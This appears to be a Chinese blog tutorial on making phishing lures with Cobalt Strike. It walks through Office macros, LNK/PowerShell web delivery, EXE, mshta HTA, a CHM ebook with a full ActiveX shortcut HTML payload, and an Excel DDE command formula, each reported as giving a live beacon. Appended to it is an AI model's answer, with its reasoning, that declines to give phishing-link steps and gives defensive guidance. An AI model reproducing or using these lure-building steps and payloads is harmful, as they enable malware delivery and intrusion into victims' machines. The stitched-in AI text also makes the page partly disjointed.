钓鱼鱼饵制作的方式

一、.Office 钓鱼攻击

启动我们的服务端和客户端,详情查看

cs的搭建和使用-CSDN博客

然后在我们的客户端的有效载荷中选择office宏

选择我们的监听器

生成之后复制我们的宏代码

这里需要注意的是需要使用word文档,不能使用wps word文档,而且要在信任中心打开我们的所有宏

接下来在菜单栏中选择视图中的宏,点击查看宏

为当前文档创建一个宏

将我们刚刚生成的宏代码复制进去

保存下来,它会提示我们如下内容,我们选择是

再次点击word文档,发现我们监听成功

二、lnk 快捷方式钓鱼

选择攻击中的web投递

类型选择为powershell,监听器选择当前的监听器

运行,他会给我们一段命令

我们去运行一下这个命令

发现上线成功

三、powershell

选择有效载荷中的payload生成器

输出格式选择powershell command

点击生成之后,他会给我们生成一个txt文件

我们查看一下内容,发现是一大段命令

我们去执行一下

发现上线成功

四、exe

选择有效载荷中的Windows可执行程序

选择我们的监听地址,创建一个exe文件

将这个exe文件创建下来,在我们的电脑中就可以看到我们刚刚创建的这个exe文件

我们运行一下,可以看到监听到了我们的电脑

五、mshta上线

选择有效载荷中的HTA文档

类型选择poweishell

生成后发现我们的电脑中多了一个hta文件

然后点击站点管理中的文件托管

文件选择刚刚生成的hta文件,其余不变

运行之后,他给了我们一个地址

然后我们在我们的电脑中运行如下命令

mshta 你自己的链接

上线成功

六、chm电子书钓鱼

下载地址:https://www.zipghost.com/download/easychm/echmsetup.exe

选择攻击中的web投递

按照之前的操作生成一个命令

创建一个html文件,将下述代码写入其中,并替换其中的命令,并在powershell.exe后加逗号

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec 
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=",你自己生成的命令>
 <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

修改后如下

创建一个新的文件夹 里面创建两个文件夹,并将我们刚刚创建的html文件添加进去

在chm中新建一个目录,地址选择我们刚刚创建的总文件夹

点击编译,生成

会发现我们的电脑中多了如下文件

双击运行,发现上线成功

七、execl

打开office外部内容中的启用动态数据交换服务器启动功能

构造一个恶意载荷

=1+cmd|' /C calc'!A0

输入到表格的随便一格中去,保存发现被执行了

<think>嗯,用户的问题是关于制作钓鱼链接的。这显然是一个涉及网络安全的敏感话题。用户可能对网络攻防技术感兴趣,也可能是出于学习防御的目的。但无论如何,直接教授攻击技术都是不合适的。 从引用内容来看,用户似乎已经接触过一些钓鱼网站的制作教程[^1][^2],甚至包括社工钓鱼样本的制作方法[^3]。这些资料展示了内网钓鱼、网站克隆、恶意文件捆绑等具体步骤。不过用户这次更聚焦在"钓鱼链接"这个具体环节上。 需要特别注意法律和伦理边界。钓鱼攻击属于违法行为,即使用户声称是用于测试或学习,也不能提供具体操作指导。应该着重强调防御视角——通过了解攻击原理来加强防护。 在专业层面,钓鱼链接的核心原理是"伪装"和"诱导":短链接服务隐藏真实地址、相似域名混淆视觉、社会工程话术制造紧迫感等。这些技术点可以从防御角度展开说明,让用户明白如何识别这类攻击。 回复结构应该先明确法律立场,然后解析技术原理(侧重识别方法),最后给出防御建议。这样既满足用户的技术好奇心,又引导其走向合法合规的学习方向。相关延伸问题可以围绕防御策略展开,比如邮件过滤规则或域名监控技术。 必须避免任何可能被误解为教学的内容,包括具体工具名称、代码示例或分步操作。引用资料中提到的setoolkit、WinRAR捆绑等细节[^1][^3]尤其不能展开讨论。</think>我理解您想了解钓鱼链接的制作原理,但必须首先强调:**制作钓鱼链接用于欺骗他人获取敏感信息是违法行为,可能导致严重法律后果**。作为负责任的回答,我将从**网络安全防御角度**解析钓鱼链接的技术原理及防范措施。 --- ### 钓鱼链接的核心技术原理(防御视角) 1. **域名伪装** - 使用形似正规域名的变体:如 `paypa1.com`(数字1代替字母l)、`amaz0n.net`(0代替o) - 利用子域名混淆:`secure.bank.com.attacker.com`(实际指向`attacker.com`) 2. **链接缩短与重定向** 通过短链服务(如bit.ly)隐藏真实地址,用户点击后跳转至钓鱼页面[^1]。 3. **HTML欺骗** 在邮件或网页中显示合法链接,实际指向恶意地址: ```html <a href="http://phish-site.com">点击访问正规银行网站</a> ``` 4. **漏洞利用** 在合法网站注入恶意脚本(如XSS攻击),诱导用户点击“看似安全”的链接[^2]。 --- ### 如何识别钓鱼链接(用户防护) | 检测方法 | 操作示例 | |-------------------|----------------------------------| | 悬停检查 | 鼠标悬停链接查看浏览器状态栏真实地址 | | 域名验证 | 手动输入官网域名而非点击邮件链接 | | HTTPS证书检查 | 点击地址栏锁形图标验证证书所有者 | | 使用链接扫描工具 | VirusTotal或URLScan.io在线分析 | --- ### 防御建议(技术层面) 1. **企业防护** - 部署邮件网关过滤可疑链接 - 启用DMARC/SPF/DKIM邮件认证协议 - 定期进行钓鱼演练培训员工 2. **个人防护** - 启用多因素认证(MFA) - 浏览器安装反钓鱼插件(如Netcraft Extension) - 敏感操作前确认网站SSL证书信息 > 网络安全的核心是责任意识:任何攻击技术的了解都应仅用于提升防御能力,而非实施侵害[^3]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值